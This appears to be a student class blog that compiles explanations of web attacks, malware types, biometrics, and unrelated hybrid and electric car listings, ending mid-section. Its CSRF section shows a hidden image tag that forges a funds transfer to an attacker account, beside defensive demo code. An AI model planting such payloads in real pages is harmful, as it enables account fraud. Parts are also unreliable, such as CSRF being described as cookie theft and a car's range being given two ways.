A symlink is basically a special file that “points to” a hard link on a mounted file system. A symlinking attack occurs when a hacker positions the symlink in such a way that the user or application that accesses the endpoint thinks they’re accessing the right file when they’re really not.

If the endpoint file is an output, the consequence of the symlink attack is that it could be modified instead of the file at the intended location. Modifications to the endpoint file could include appending, overwriting, corrupting, or even changing permissions.

In different variations of a symlinking attack a hacker may be able to control the changes to a file, grant themselves advanced access, insert false information, expose sensitive information or corrupt or destroy vital system or application files.
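The usual mitigation is to open output files in a way that refuses to follow a link planted at the expected path. The comparison below is an added example, not part of the original article; the file names are constructed, and it assumes a POSIX system where `O_NOFOLLOW` is available.

```python
import errno
import os
import tempfile


def naive_write(path, data):
    # Follows symlinks: if `path` is a link, its target is truncated and overwritten.
    with open(path, "w") as f:
        f.write(data)


def safe_create(path, data):
    """Create a new file; refuse if anything (file or symlink) already exists at `path`."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)   # FileExistsError when a link was planted
    with os.fdopen(fd, "w") as f:
        f.write(data)


def safe_append(path, data):
    """Append to an existing file; refuse if the final path component is a symlink.

    O_NOFOLLOW only guards the last component; directories earlier in the
    path must themselves be writable only by trusted users.
    """
    flags = os.O_WRONLY | os.O_APPEND | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags)          # OSError(ELOOP) on a symlink (Linux, macOS)
    with os.fdopen(fd, "a") as f:
        f.write(data)


def demo():
    """Plant a link where the application expects its output and try each writer.

    Returns {writer: (outcome, content of the protected file afterwards)}.
    """
    results = {}
    writers = (("naive", naive_write), ("create", safe_create), ("append", safe_append))
    with tempfile.TemporaryDirectory() as d:
        victim = os.path.join(d, "important.conf")   # file that must not change
        link = os.path.join(d, "app.log")            # path the application writes to
        for name, writer in writers:
            with open(victim, "w") as f:
                f.write("original")
            if os.path.lexists(link):
                os.remove(link)
            os.symlink(victim, link)
            try:
                writer(link, "attacker-influenced data")
                outcome = "written"
            except FileExistsError:
                outcome = "refused: path exists"
            except OSError as e:
                outcome = "refused: symlink" if e.errno == errno.ELOOP else "error"
            with open(victim) as f:
                results[name] = (outcome, f.read())
    return results


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```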

8. CROSS SITE REQUEST FORGERY ATTACKS

A Cross Site Request Forgery Attack happens when a user is logged into a session (or account) and a hacker uses this opportunity to send them a forged HTTP request to collect their cookie information.

In most cases, the cookie remains valid as long as the user or the attacker stays logged into the account.  This is why websites ask you to log out of your account when you’re finished – it will expire the session immediately.

In other cases, once the user’s browser session is compromised, the hacker can generate requests to the application that will not be able to differentiate between a valid user and a hacker.

A CROSS SITE ATTACK EXAMPLE

Here’s an example:

http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

<img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

In this case the hacker creates a request that will transfer money from a user’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.
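The forged image request works because the endpoint changes state on a GET and trusts the session cookie alone. The handler below is an added example, not part of the original article: it accepts the transfer only as a POST carrying a token bound to the session. The handler, the token scheme and the `csrf_token` field name are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qsl, urlsplit

SERVER_KEY = secrets.token_bytes(32)   # per-deployment secret, generated here for the demo

# The forged URL from the example above, as the victim's browser would request it.
FORGED_URL = "http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#"


def csrf_token(session_id):
    """Token bound to one session: HMAC-SHA256(server key, session ID).

    The server embeds it in its own forms; another site cannot read or compute it.
    """
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def params_of(url):
    """Query parameters of a URL as a dict."""
    return dict(parse_qsl(urlsplit(url).query))


def handle_transfer(method, session_id, params):
    """Hypothetical handler for /app/transferFunds. Returns (status, message).

    `session_id` is what the browser's cookie resolved to; the browser attaches
    that cookie to forged requests too, so it cannot be the only check.
    """
    if session_id is None:
        return 401, "not logged in"
    if method != "POST":
        # <img> and link loads are GETs; they must never change state.
        return 405, "state-changing action requires POST"
    supplied = params.get("csrf_token", "")
    expected = csrf_token(session_id)
    # Constant-time comparison, on bytes so that odd input cannot raise.
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403, "missing or invalid CSRF token"
    return 200, f"transferred {params['amount']} to {params['destinationAccount']}"


def replay_scenarios():
    """Run the forged and the legitimate requests; return {scenario: status}."""
    victim = secrets.token_urlsafe(32)     # constructed session IDs
    other = secrets.token_urlsafe(32)
    forged = params_of(FORGED_URL)
    legit = {"amount": "1500", "destinationAccount": "4673243243",
             "csrf_token": csrf_token(victim)}
    return {
        "forged img GET": handle_transfer("GET", victim, forged)[0],
        "forged cross-site POST": handle_transfer("POST", victim, forged)[0],
        "token from another session": handle_transfer(
            "POST", victim, {**forged, "csrf_token": csrf_token(other)})[0],
        "legitimate form POST": handle_transfer("POST", victim, legit)[0],
    }


if __name__ == "__main__":
    for scenario, status in replay_scenarios().items():
        print(f"{scenario:28s} {status}")
```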

9. REMOTE CODE EXECUTION ATTACKS

A Remote Code Execution attack is a result of either server side or client side security weaknesses.

Vulnerable components may include libraries, remote directories on a server that haven’t been monitored, frameworks, and other software modules that run on the basis of authenticated user access. Applications that use these components are always under attack through things like scripts, malware, and small command lines that extract information.

The following vulnerable components were downloaded 22 million times in 2011:

Apache CXF Authentication Bypass (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451)

By failing to provide an identity token, attackers could invoke any web service with full permission.

10. DDOS ATTACK – DISTRIBUTED DENIAL OF SERVICE ATTACK

DDoS, or Distributed Denial of Service, is where a server or a machine’s services are made unavailable to its users.

And when the system is offline, the hacker proceeds to either compromise the entire website or a specific function of a website to their own advantage.

It’s kind of like having your car stolen when you really need to get somewhere fast.

The usual agenda of a DDoS campaign is to temporarily interrupt or completely take down a successfully running system.

The most common example of a DDoS attack could be sending tons of URL requests to a website or a webpage in a very small amount of time.  This causes bottlenecking at the server side because the CPU just ran out of resources.

Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers.

Source: http://defencely.com/blog/tag/types-of-hacking/

————————————————

C. What is one problem with using biometrics for identification?

In my own opinion, nothing is 100% secure. Consider the additional cost of authentication equipment (retinal scanners, fingerprint scanners) and authentication software (can’t run the hardware without the drivers and software for them) compared to something like an ATM card where you take cheaper fabrication of plastics and let the user assign a meaningful code to them.

-Judems Daub BSIT-III

Hacking

The word hacker originally was used to describe someone who was proficient in using a computer. The word did not receive its bad connotation until the 1980s. Early “hackers” were people who enjoyed exploring computers and making them do things that were unheard of at the time. A “good hack” was used to describe a well coded program, but in today’s world, when people hear the word hack they usually begin to think of someone who manipulates or steals information and uses it for their own personal gain.
-Joshua Dixon
Hacking is when somebody gains access to a computer, typically without permission, to perform a certain task. Tasks range from using the computer as a distribution point for spam, downloading files from the computer, stealing account info for various services, etc.
Examples of Hacking

1. Trojans

A Trojan is malware disguised as harmless software, named after the wooden horse the ancient Greeks used to trick their way into the city of Troy. The intent of the hacker is to get you to install it by making you believe it’s safe. Once installed on your computer, a Trojan can do anything from logging your keystrokes, to opening a backdoor and giving the hacker access to your system.

There are several ways in which a Trojan can infect your personal computer. The most common infection vector hackers use is to trick you into clicking on a file or email attachment. Often, these attachments can come to you by way of a friend whose account has already been compromised, making you believe the contents are from a trustworthy source. Other times the hacker may try to scare you into opening the attachment, making it seem like it is an official notice from the IRS, FBI, or your bank.

Email may be a popular delivery vehicle for Trojans, but it’s not the only one. Clicking on a malicious link on Facebook or other social media sites can allow a hacker to inject a Trojan into your personal computer. Even though these sites take security seriously and are as vigilant as possible, there have been instances when Trojans have infected users this way.

2. Drive-By Downloads

In a drive-by download attack, you don’t have to click on anything to initiate the download and installation of malware – just visiting a website that has been compromised is enough to get your computer infected. A rather dated but good example of this was the infected site known as LyricsDomain.com. According to Spyware Warrior, in 2004, Internet users who visited LyricsDomain.com had unwanted software installed on their systems – a collection of eight advertising programs that, in addition to causing other problems, hijacked the users’ homepage and search bar, and placed advertisements in the users’ “Favorites” folder.

A drive-by download exploits exposed security flaws in your web browser, operating system, or other software that has not been recently updated or patched. Unfortunately, the download and installation of the malware is invisible to the victim. Also, there is no way to tell whether a website is infected just by looking at it.

If you suspect that a site poses a possible threat to your computer, check a blacklist of malicious websites before navigating to the homepage. BlackListAlert.org is a free service that can alert you as to which sites have been placed on a blacklist.

The stealth and effectiveness of a drive-by download make it one of the best methods in a hacker’s arsenal today. As a result, this form of attack has been on the rise and will only continue to get worse unless computer users take the proper precautions. Updating your software and using the latest version of your favorite web browser is a good start since it will close any newly discovered security holes these infected sites can exploit.

3. Rootkits

A rootkit is not exactly malware like a virus or Trojan. It is something much more insidious: a malicious segment of code injected into your computer system, designed to hide any unauthorized activity taking place. Since rootkits grant administrative control to the attacker, your computer can be used without restrictions and without your knowledge.

A rootkit can attack and replace important operating system files, allowing it to hide or disguise itself and other malware. Once a rootkit has buried itself deep within your system, it can cover an intruder’s tracks (by altering system logs), cover up evidence of malicious processes running in the background, hide files of all types, and open a port to create a backdoor.

Some rootkits are designed to infect a computer’s BIOS (basic input/output system), which is a type of firmware that initializes the hardware when your computer is powered on. When rootkits invade this part of your system, it makes even operating system reinstallation or disk replacement an ineffective strategy to neutralize the rootkit infection.

Many of the worst, most destructive kinds of malware use rootkit technology. Since rootkits can infect different areas and different files, it is very difficult for even moderately experienced users to deal with them. Unfortunately, you will not even know whether you have this type of malware since it is designed to hide itself so effectively. That is why avoiding questionable sites, diligently updating your antivirus software, avoiding dubious email attachments, and generally protecting your system is a good way to make sure you never fall victim to this type of ingeniously malicious infection.

Source: http://www.moneycrashers.com/computer-hacking-methods-examples-cyber-criminals/

One problem with using Bio-metrics for identification

Biometrics are a security approach that offers great promise, but also presents users and implementers with a number of practical problems.  Whilst some of these are technical, and possess technical solutions, however difficult they may be to implement, others are social and cultural.  Social and cultural barriers are much more complicated to resolve, and need much more thought by would-be implementers as well as the manufacturers and suppliers before they will succeed.  Culturally, one size does not fit all, and that may increase the cost and complexity of solutions.

For some considerable time now the personal identification segment of the IT security industry has been trying to improve on the use of the identifier and password as the means of authenticating the user of an IT service.  The problems of managing password based systems, their weaknesses, and the (now) classical ways of attacking or subverting such systems are well documented and need not be considered here.

Many consider that such simple authentication measures need to be reinforced, and refer to multi-factor authentication, based upon:

  • a secret that you know (password)
  • something that you have (a token)
  • something that you are (a biometric).

In the IT world, probably the most commonly implemented method for token authentication is the SecurID token. (Smart cards for mass transit rail systems and telephone cards are more numerous, although they do not really authenticate the user. Possession of the token authorizes the holder to have a use.)

The introduction of advanced security techniques such as public key cryptography (better known as PKI – public key infrastructure) has increased the need to be able to store secret information (a private key), because a user could never remember a randomly constructed password that long (RSA 2048 would require you to remember a mere 256 characters worth of information and be able to input it reliably!).

The rapid increase in fraud, and in particular credit card fraud, is creating demands for greater security methods than magnetic stripe cards and handwritten signatures offer.  This has seen many card issuers issue chip or smart cards which require a password (commonly a four digit PIN) before they can be used.  However, these are by no means generally implemented.  A spot check on the various cards in my pocket showed only 50% of the various bank/credit cards have chips, whilst none of the others have that facility.

Source: http://www.articsoftpgp.com/biometrics.htm

 

-Geraldine Kaye Medrocillo

The Definitions, Examples of Hacker, and Problem of using Biometrics

According to my research, in the early days of computing, the word “hacker” meant a creative programmer who wrote very elegant or clever programs. The word hacker originally was used to describe someone who was proficient in using a computer. The word did not receive its bad connotation until the 1980s. Early “hackers” were people who enjoyed exploring computers and making them do things that were unheard of at the time. A “good hack” was used to describe a well coded program, but in today’s world, when people hear the word hack they usually begin to think of someone who manipulates or steals information and uses it for their own personal gain.

“Hybrid Cars”

Defining Hybrids
A vehicle is a hybrid if it utilizes more than one form of onboard energy to achieve propulsion. In practice, that means a hybrid will have a traditional internal-combustion engine and a fuel tank, as well as one or more electric motors and a battery pack.

Hybrid cars are sometimes mistakenly confused with electric vehicles. Hybrids are most often gasoline-burning machines that utilize their electric bits to collect and reuse energy that normally goes to waste in standard cars. Theoretically, diesel-electric hybrids would be even more fuel-efficient, but hybrid systems and diesel engines both represent extra cost. So far, installing both in the same vehicle has proven to be prohibitively expensive.

Examples:

  1. Outlander PHEV GX4hs

    New features for 2016

    • Auto-Dimming Rear View Mirror
    • New Design Leather Seats
    • LED Daytime Running Lights
    • Luggage Compartment 12v Socket
    • LED Foot-well Illumination
    • Three Digit MPG Display
    • Steering Wheel Heater
    • New Mitsubishi Multi Communication System
    • 360 Camera with Steering Wheel Switch
    • Super Wide Range LED Headlamps with Auto-levelling
    • Front & Rear Parking Sensors
    • Unintended Acceleration Mitigation System (UMS)
  2. Toyota Yaris

Yaris is a very clever car. A no fuss world that’s big on convenience.

Audio System

Yaris models feature a 6.1″ Touchscreen Audio Display with USB connectivity for iPods® and MP3 players plus Bluetooth® functions for added flexibility.

ZR Hatch & all Sedan grades feature Voice Recognition technology to help you stay focused on the road ahead. Both the ZR Hatch and YRX Sedan also feature Satellite Navigation (Sat Nav) with 3D graphics and SUNA™ Traffic Updates and Toyota Link.

Sat Nav or Satellite Navigation is a system which displays the location of the vehicle on a “map” screen, and can be programmed to provide information such as directions to a destination both visually, and with spoken messages. Image shown for illustration purposes only. Specification may vary across models.


Steering wheel controls

Throughout the Yaris hatch range, steering wheel controls give you fingertip control of audio. So you don’t even need to take your hands off the wheel.

You know where you are with Yaris

The ZR hatch and YRX sedan models are fitted with Sat Nav which includes a traffic avoidance system, which can help you keep clear of traffic congestion.

Open sesame. Keyless entry system

All Yaris grades come with remote central locking. So when it’s pouring with rain or you have a load of shopping or luggage to unload, there’s no need to fumble with your keys in the door when you park or load up.

3. Volkswagen Golf GTE

Composition Media

With a raft of features, from Intuitive HMI, Touchscreen, CD Drive, Bluetooth telephony, front and rear speakers and more, Composition Media delivers something for everyone.

Discover Media

The optional Discover Media provides the best of both entertainment and driver assistance. The impressive Map Navigation feature provides 3 calculated routes, a driver can always choose between the fastest, the shortest or the most eco-friendly way. With a 5.8″ touchscreen capacitive colour display in QVGA.

Air conditioning, 2Zone Climatronic

Climatronic air conditioning with 2-zone temperature control lets you set two different temperature zones in your car – for both the driver and front passenger seats. So you can both adjust your air conditioned environment to be just the way you like it.

Advanced telephone connection

The optional advanced telephone connection gives you all the benefits of in car communication with an improved connection for your phone and the convenience of an integrated holder with charging function.

Multi Device Interface

You can choose a personal soundtrack to your drive with the Multi-Device Interface. Tucked away neatly and securely, it offers you a fast and easy link to files on your MP3 player, iPod and USB memory stick.

Ambient lighting

The dashboard, doors and footwell are illuminated by the optional ambient lighting creating a pleasant atmosphere. The pack also includes LED reading lights.

Adjustable Steering Column

The steering column can be fully adjusted to suit your individual driving requirements with the length and height adjustment newly redesigned.

Driver Alert System

The Driver Alert system analyses driver behaviour and gives both visual and audible warnings with advice to take a break.

4. Toyota Prius

Iconic styling

Innovation comes in many forms, but never has it been as elegant and refined as the latest generation Prius.


Hybrid Performance

With Prius you can enjoy efficiency without sacrificing power. The 4th Generation Hybrid Synergy Drive® delivers remarkable fuel efficiency without compromising performance.


Cutting Edge Technology

Every Prius is packed with the latest intelligent technology. Each innovation has been developed to make driving easier, smoother and more intuitive. All are a result of clever thinking that strives to deliver an enhanced driving experience, in all driving conditions.


Car Safety

Wherever you travel, whether it’s out on the open road or zipping about city streets, it’s reassuring to know when you get behind the wheel of Prius, you’re protected by some of the most advanced safety features and technology ever developed.

 

Posted here by:

FELISCUZO, Rusel II B.

9 Awesome Futuristic Car Concepts

Electric Cars 2016

Audi A3 E-Tron

Plug-in Hybrid Luxury

16 miles (electric + gasoline)
$37,900

After years of developing all kinds of plug-in prototypes, Audi put one on sale in January 2016. The A3 Sportback platform has a compelling mix of attributes—elegant lines, high-quality materials and practicality. Combine that with a capable 1.4-liter turbocharged gas engine and an electric powertrain providing about 16 miles of electric driving. The result is a small snazzy and robust plug-in hybrid.

BMW 330e

Plug-in Hybrid Sedan

14 miles (electric + gasoline)
$43,700

If you like the styling and road manners of a BMW 3-Series, but want to push the envelope on efficiency, then the 330e is the answer. Commutes of less than 14 miles can happen purely on electricity, with an official 72 MPGe rating. Punch the accelerator for combined power from a 2-liter turbocharged engine and 87-hp electric motor. That results in nearly as much torque as the V6 340i at a lower purchase price after federal incentives.

BMW i3

Electric Vehicle Sedan

81 miles (pure electric)
$43,300

The stylish if slightly odd-looking BMW i3 is the lightest EV on the market. That makes it very efficient while providing a fast and fun 170-horsepower ride. The i3’s battery pack delivers more than 80 miles of range. The electric Bimmer is also available with a small gas engine that essentially doubles that distance.

BMW i8

Plug-in Hybrid Coupe

25 miles (electric + gasoline)
$137,000

The i8 is BMW’s expensive sleek futuristic plug-in hybrid supercar. The car is powered in a one-two punch by a powerful 96-kilowatt (129-horsepower) electric motor driving the front wheels—and an efficient 230-horsepower 1.5-liter turbocharged three-cylinder gasoline engine motivating the rear wheels. The car has a delightful split personality: switching on command between virtuous EV silence, and a delightful Porsche-like engine note when driven as a sports machine.

BMW X5 xdrive40e

Plug-in Hybrid SUV

13 miles (electric + gasoline)
$64,000

The X5 is everything you’d expect from a BMW. High quality materials abound inside the vehicle’s refined cabin. A turbocharged 2.0-liter engine and 111-horsepower electric motor provide a solid 308 horsepower and 332 pound-feet of torque. With the ability to plug in, X5 xDrive 40e grants 13 miles in electric-only mode, and 24 mpg strictly from the gas engine.

Cadillac ELR

Plug-in Hybrid Coupe

37 miles (electric + gasoline)
$76,000

The ELR boasts an electric-only range of 37 miles and a total combined range of about 340 miles. The ELR shares most of its technical elements with the current Chevy Volt, including its 1.4-liter gasoline engine and 17-kWh lithium-ion battery pack. The ELR features Cadillac’s signature angular look, but that alone is not worth the steep price.

Chevrolet Spark EV

Electric Vehicle Coupe

82 miles (pure electric)
$26,000

The Spark EV is the all-electric version of Chevy’s five-door urban mini-car. The powerful motor, quick acceleration, and short wheelbase make it an exhilarating drive. At an estimated 119 MPGe, it’s one of the most efficient electric cars on sale today.

Chevy Volt

Plug-in Hybrid Sedan

53 miles (electric + gasoline)
$34,000

The 2016 Chevy Volt ushers in the second generation of the world’s most popular plug-in hybrid. While the first-generation model was designed to attract early adopters, the 2016 edition expands the Volt’s market reach to a broader segment of car buyers. It has more all-electric range; it’s faster; and its design is more pleasant.

Fiat 500e

Electric Vehicle Coupe

84 miles (pure electric)
$32,600

The Fiat 500e is every bit as cute as the gas-powered Fiat 500. It uses a 24 kilowatt-hour liquid-cooled lithium-ion battery pack, providing an official EPA range of 84 miles. The Fiat 500e is widely considered a “compliance” car produced only in small numbers to meet California regulations.

Ford C-Max Energi

Plug-in Hybrid Wagon/Van

19 miles (electric + gasoline)
$32,600

The Ford C-Max Energi is a compelling alternative to the other leading plug-in hybrids—the Chevy Volt and Plug-in Prius. It offers 19 miles of all-electric driving, 620 miles of total range, and an attractive price. The C-Max is considered a small “activity” vehicle, which is popular in Europe but not widely available in the United States. The small wagon-like platform is versatile and functional.

Ford Focus Electric

Electric Vehicle Sedan

76 miles (pure electric)
$29,200

The five-door hatchback provides about 80 miles of range. It offers many features that make it an enticing EV package, including an attractive design and zippy drive. The Focus Electric employs a 107-kilowatt (143 horsepower) motor, compared to the LEAF’s 110 horsepower motor.

Ford Fusion Energi

Plug-in Hybrid Sedan

19 miles (electric + gasoline)
$33,900

The Ford Fusion Energi offers a robust plug-in electric system in an ultra-popular roomy full-size sedan platform. The model offers the equivalent of about 100 miles per gallon, without compromising style or passenger space. After its battery is depleted, the Fusion Energi still delivers 38 miles per gallon.

Hyundai Sonata Plug-in Hybrid

Plug-in Hybrid Sedan

27 miles (electric + gasoline)
$35,400

Hyundai takes on the plug-in competition with a powerful motor, six-speed automatic transmission, and a battery pack providing about 27 miles of all-electric range. It’s packaged in the attractive and comfortable Sonata mid-size sedan.

Kia Soul EV

Electric Vehicle Sedan

93 miles (pure electric)
$34,500

Hyundai-Kia arrived late to the EV party. But it appears that Kia made a careful study of the competition, and loaded its Soul EV with smart features for electric car drivers. For starters, it offers 93 miles of real-world range.

Mercedes B-Class Electric Drive

Electric Vehicle Sedan

85 miles (pure electric)
$42,400

This small Mercedes electric car directly competes with the BMW i3. Its powertrain is provided by Tesla Motors, but engineers turned it into a comfortable and relaxed commuter car. If driven with care, the well-appointed B-Class could offer around 100 miles of range from a battery pack capable of holding 31.5 kilowatt-hours of juice.

Mercedes C350 Plug-in Hybrid

Plug-in Hybrid Sedan

20 miles (electric + gasoline)
$46,400

The second plug-in hybrid from Mercedes is brought to the small luxury C-Class. It’s both sporty, with total output of 275 horsepower, and capable of about 20 miles of ultra-efficient electric driving. The C350 is stylish, well appointed, and loaded with advanced safety features. The ability to plug in will push the C-Class car to new levels of efficiency.

Mercedes S550 Plug-in Hybrid

Plug-in Hybrid Sedan

20 miles (electric + gasoline)
TBD

It’s hard to find flaws in a Mercedes S-Class. In the past, power and comfort came at some price in terms of fuel efficiency. With the S550 Plug-in Hybrid, you get all the benefits of the Mercedes flagship sedan, but now with 20 miles of all-electric range and (depending on how you drive and charge) as much as 40 miles per gallon.

Mercedes-Benz GLE550e

Plug-in Hybrid SUV

12 miles (electric + gasoline)
$67,000

The Mercedes-Benz GLE550e 4Matic brings the plug-in hybrid system of the S550 large sedan—which has been available in the United States since 2015—to the brand’s largest crossover SUV model: the GLE. With an all-electric range of about 12 miles, the GLE isn’t going to revolutionize the market. Yet, it provides another option for shoppers looking for a large luxury plug-in hybrid crossover.

Mitsubishi i-MiEV

Electric Vehicle Sedan

62 miles (pure electric)
$23,800

The Mitsubishi i-MiEV was once considered a front-runner in the race for a mass-market EV. The cute car claims a max speed of 80 mph and a range of about 75 miles. But with the i-MiEV’s small size and modest electric drivetrain, and limited production numbers, it has become more of an also-ran.

Nissan LEAF

Electric Vehicle Sedan

107 miles (pure electric)
$29,000

The Nissan LEAF is by far the most popular EV in the world. It is a well-equipped, all-electric hatchback that seats five adults and can travel up to 107 miles on a single charge. The LEAF is available to test-drive and purchase at Nissan dealerships throughout the United States.

Porsche Cayenne S E-Hybrid

Plug-in Hybrid SUV

14 miles (electric + gasoline)
$78,000

The Cayenne S E-Hybrid is the first luxury plug-in SUV to hit the market. It combines the stylish lines and sporty performance of a Porsche in the form of its popular crossover. Now add a 10.8 kilowatt-hour battery, which means about 14 miles of all-electric driving, and total average EPA efficiency of 47 MPGe.

Porsche Panamera S E-Hybrid

Plug-in Hybrid Sedan

16 miles (electric + gasoline)
$93,000

The Porsche Panamera S E-hybrid is a luxury sports sedan first, and a plug-in hybrid second. The four-seater is powered by a 3.0-liter, V6 supercharged gasoline engine, paired with a 70-kilowatt electric motor. It provides about 22 miles of all-electric range and a top speed of 167 miles per hour.

Smart Electric Drive

Electric Vehicle Coupe

68 miles (pure electric)
$25,000

The latest version of the tiny two-seat city car is a vast improvement over Smart’s previous all-electric versions. Measuring just over 106 inches from tip to tail, and a shade under 62 inches tall and wide, the Smart ForTwo Electric Drive is small enough to occupy the smallest of spaces. And it’s the only EV available with a convertible top.

Tesla Model S

Electric Vehicle Sedan

315 miles (pure electric)
$71,000

The Tesla Model S is a bright vision of a practical and desirable all-electric sedan. Tesla set a big goal for itself: to deliver not just a great EV, but one of the world’s best luxury sedans. Mission accomplished.

Tesla Model X

Electric Vehicle SUV

289 miles (pure electric)
$80,000

The Model X is Tesla’s follow-up vehicle to the award-winning Model S sedan. The X shares about 60 percent of the content from the sedan—converting the sleek Maserati-looking five-passenger model into a stylish crossover utility vehicle.

Volkswagen E-Golf

Electric Vehicle Sedan

83 miles (pure electric)
$29,800

The Volkswagen E-Golf is the company’s first all-electric car. It maintains the spirited driving experience of internal combustion versions of the Golf—one of the most popular small cars in the world. The VW E-Golf is arguably the best handling car among the emerging class of small affordable EVs.

Volvo XC90 T8

Plug-in Hybrid SUV

17 miles (electric + gasoline)
$69,000

The Volvo XC90 T8 is a luxury high-performance plug-in hybrid SUV. It offers comfort, safety, and a level of efficiency previously thought impossible in an all-wheel-drive people-mover. It’s expected to offer about 17 miles of all-electric range, and the equivalent total fuel economy of 59 miles per gallon.

Chevrolet Bolt

Electric Vehicle Sedan

238 miles (pure electric)
$37,500

With the Bolt, General Motors will be the first to offer an affordable long-range electric car, rated to provide 238 miles on a single charge. It’s due before the end of 2016.

Toyota Prius Plug-in Hybrid (Prime)

Plug-in Hybrid Sedan

22 miles (electric + gasoline)
TBD

The 2017 Toyota Prius Prime replaces the Prius Plug-in Hybrid, which Toyota ceased producing in June 2015. The Prius Prime is expected to achieve an EV-only range of 22 miles thanks to its 8.8-kWh lithium ion battery pack—which doubles the capacity of the former 4.4-kWh pack.

Chrysler Pacifica Plug-in Hybrid

Plug-in Hybrid Wagon/Van

30 miles (electric + gasoline)
TBD

Chrysler unveiled the all-new 2017 Pacifica Plug-in Hybrid at the 2016 Detroit auto show. It is Chrysler’s first plug-in car—and the industry’s first plug-in hybrid minivan. With the rise of crossover SUVs, and the stodgy image of bloated family-haulers, the minivan market has shrunk in the past decade or so. Perhaps Chrysler’s plug-in hybrid, offering 30 miles of all-electric range, will lure families back into the segment.

Tesla Model 3

Electric Vehicle Sedan

200 miles (pure electric)
$35,000

Tesla would have to defy all expectations to achieve success on the Model 3, while avoiding all the potential pitfalls—not only for the 200-mile $35,000 Model 3, but a massive new battery factory. Yet, based on the unveiling of the car in March 2016, the company appears ready to make another ground-breaking electric car.

Porsche 918 Spyder

Plug-in Hybrid Coupe

12 miles (electric + gasoline)
$845,000

The Porsche 918 Spyder is a plug-in hybrid supercar, produced in a limited quantity of 918. Porsche makes plug-in hybrid versions of the Panamera and Cayenne. But the ultra-expensive 887-horsepower 918 Spyder is in the echelon of the McLaren P1 and LaFerrari. The 918 pays homage to iconic sports cars like Porsche’s Carrera GT and 959.

McLaren P1

Plug-in Hybrid Coupe

19 miles (electric + gasoline)
$1,150,000

The McLaren P1 is a limited-run British plug-in hybrid sportscar. It’s considered one of the most exciting road cars ever built. The $1.15 million P1’s 3.8-liter 727-hp V-8 is paired with a 177-hp electric motor to unleash a mind-boggling 903-horsepower, revealing that plug-in hybrid technology can be applied to the highest end of supercar performance.

 

Source: http://www.plugincars.com/cars

Posted By: Cristina O. Libuna

Judems Daub

 

CYBER SECURITY, CYBER CRIMINAL, AND TOP CYBER SECURITY TRENDS

What is Cyber Security?

While rapid technological developments have provided vast areas of new opportunity and potential sources of efficiency for organisations of all sizes, these new technologies have also brought unprecedented threats with them. Cyber security – defined as the protection of systems, networks and data in cyberspace – is a critical issue for all businesses. Cyber security will only become more important as more devices, ‘the internet of things’, become connected to the internet.

Introduction to cyber criminals

Cyberspace is unregulated and cyber crime is increasingly simple and cheap to commit: the Fortinet 2013 Cybercrime Report found that an effective botnet – a network of private computers infected with malicious software and controlled without the owners’ knowledge – can be established for as little as $700 (about £420), or can be rented for just $535 (about £320) per week. Cyber criminals can now even buy off-the-shelf hacking software, complete with support services.

Congruent with the rapid pace of technological change, the world of cyber crime never stops innovating either. Every month, Microsoft publishes a bulletin of the vulnerabilities of its systems, an ever-growing list of known threats, bugs and viruses. For a more complete overview of cyber security threats, mailing lists such as Bugtraq can provide up-to-date resources listing all new bugs.

Types of malware

Cyber criminals operate remotely, in what is called ‘automation at a distance’, using the numerous means of attack available, which broadly fall under the umbrella term of malware (malicious software). These include:

  • Viruses
    Aim: Gain access to, steal, modify and/or corrupt information and files from a targeted computer system.
    Technique: A small software program that can replicate itself and spread from one computer to another by attaching itself to another computer file.
  • Worms
    Aim: By exploiting weaknesses in operating systems, worms seek to damage networks and often deliver payloads which allow remote control of the infected computer.
    Technique: Worms are self-replicating and do not require a program to attach themselves to. Worms continually look for vulnerabilities and report back to the worm author when weaknesses are discovered.
  • Spyware/Adware
    Aim: To take control of your computer and/or to collect personal information without your knowledge.
    Technique: By opening attachments, clicking links or downloading infected software, spyware/adware is installed on your computer.
  • Trojans
    Aim: To create a ‘backdoor’ on your computer by which information can be stolen and damage caused.
    Technique: A software program appears to perform one function (for example, virus removal) but actually acts as something else.

Attack vectors

There are also a number of attack vectors available to cyber criminals which allow them to infect computers with malware or to harvest stolen data:

  • Phishing
    An attempt to acquire users’ information by masquerading as a legitimate entity. Examples include spoof emails and websites. See ‘social engineering’ below.
  • Pharming
    An attack to redirect a website’s traffic to a different, fake website, where the individuals’ information is then compromised. See ‘social engineering’ below.
  • Drive-by
    Opportunistic attacks against specific weaknesses within a system.
  • MITM
    ‘Man-in-the-middle’ attack, in which a middleman impersonates each endpoint and is thus able to manipulate both victims.
  • Social engineering
    Exploiting the weakness of the individual by making them click malicious links, or by physically gaining access to a computer through deception. Pharming and phishing are examples of social engineering.

    5 cybersecurity trends to watch for 2016

    Here are five major trends in cybersecurity that you should have in mind when updating your InfoSec plans for 2016.

    Cloud services

    As more and more of the services we use reside in the cloud, IT departments can lose oversight and control. Employees are bypassing IT to snag the services they feel they need, and there’s a real danger that they’re bypassing security protocols and systems in the process. You should take steps to ensure that your IT department has full visibility.

    Even approved cloud vendors must be scrutinized on an ongoing basis. Do you know where your data resides? Do your cloud service providers meet your security standards? If they aren’t in compliance, their failure to meet regulatory requirements could be something that you’re liable for. Don’t take it on trust; test your third-party vendors and verify for yourself.

    Ransomware

    The impact of ransomware is growing. According to the Cyber Threat Alliance, the recent CryptoWall v3 threat has cost hundreds of thousands of users worldwide more than $325 million so far. This kind of attack encrypts important files, rendering data inaccessible until you pay the ransom. It often relies upon social engineering techniques to gain a foothold.

    It works, and we expect to see a lot more of it over the next 12 months, because the easiest way for many individuals and businesses to get their data back is just to pay the ransom. With a bit of forethought, better education and real-time security protection, not to mention a regular, robust backup routine, the threat of ransomware can be cut down to size.

    Spear phishing

